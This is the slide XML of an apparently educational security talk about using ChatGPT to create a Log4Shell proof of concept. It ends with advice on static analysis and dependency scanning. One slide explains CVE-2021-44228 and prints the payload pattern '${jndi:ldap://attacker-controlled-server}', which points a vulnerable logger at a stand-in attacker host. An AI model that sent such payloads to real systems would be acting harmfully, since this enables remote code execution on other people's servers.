              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>DO WE STILL NEED DEVELOPERS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Imagine this in the hands of real, experienced, malicious hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Make sure you are testing your application code for flaws, use static analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Make sure you test your 3rd party libraries for known vulnerabilities, use Softwre Composition Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3043650947"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:wipe dir="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FDF96E1F-F917-06D9-EBFA-8C4F8B961483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206950" y="2835242"/>
            <a:ext cx="8166380" cy="1187516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="4000" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>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5400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="00B3E6"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EFBF45E-E5F4-B0E8-A808-44440AF3ED27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609975" y="2269331"/>
            <a:ext cx="4972050" cy="2319337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank You!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379892922"/>
      </p:ext>
    </p:extLst>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A58B37B-9588-224D-C181-6F48CBF1B710}"/>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1FF7A24D-F393-3214-478E-DF69F9AD9028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E4C5A03-4634-FC5B-BBBF-24E3DE267220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDB60F41-7553-7CA1-6CB4-065E8511CD73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566443" y="1359461"/>
            <a:ext cx="2258952" cy="1231106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>fficiency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Proof of concept</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ersonal intrests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Security enthusiast </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57E7EC10-35B5-F9FE-5468-F2C829B0FFD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318531" y="1323315"/>
            <a:ext cx="3810659" cy="933589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Log4shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>old</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>known</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ChatGPT is free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ChatGPT is used by millions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCEED879-F24C-A986-7591-547F46D9FE0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3767478" y="3415902"/>
            <a:ext cx="4657044" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>The most important reason?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76AE93C3-1F86-F9F2-6223-50E316EFDC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5312773" y="3939122"/>
            <a:ext cx="1566454" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>I am lazy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED7E9B1D-7480-8E8A-7E33-D43E19DA32DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932512" y="2766012"/>
            <a:ext cx="6326975" cy="3585286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254661675"/>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8F0582B-34C5-CBDD-DB6C-EB8534347215}"/>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874C6980-20E0-A953-5DFC-1AC88970D92D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CDDC778-D8EC-A0E9-AC92-2FB72238D2B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>What is Log4shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9981AA19-03BC-7ECE-1051-0191D060228F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="260125" y="1064046"/>
            <a:ext cx="4000500" cy="4940300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F80EB79C-79AA-A587-5016-27A94B1A68DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4709565" y="1525292"/>
            <a:ext cx="6720604" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Log4j vulnerability CVE-2021-44228, also known as Log4Shell, was a critical security flaw discovered in the Apache Log4j 2 library, which is widely used in Java applications for logging purposes. It was disclosed in December 2021 and quickly gained significant attention due to its potential for widespread exploitation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6842DCF1-A519-C484-E8E8-6AADFC0D7BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4709565" y="3843717"/>
            <a:ext cx="6720604" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The vulnerability was actively exploited soon after its disclosure. Attackers could exploit CVE-2021-44228 by sending a specially crafted log message containing a payload in a format like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://attacker-controlled-server}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. When this message was logged by a vulnerable application, Log4j would attempt to perform an LDAP lookup to the attacker's server, effectively triggering the remote code execution.</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
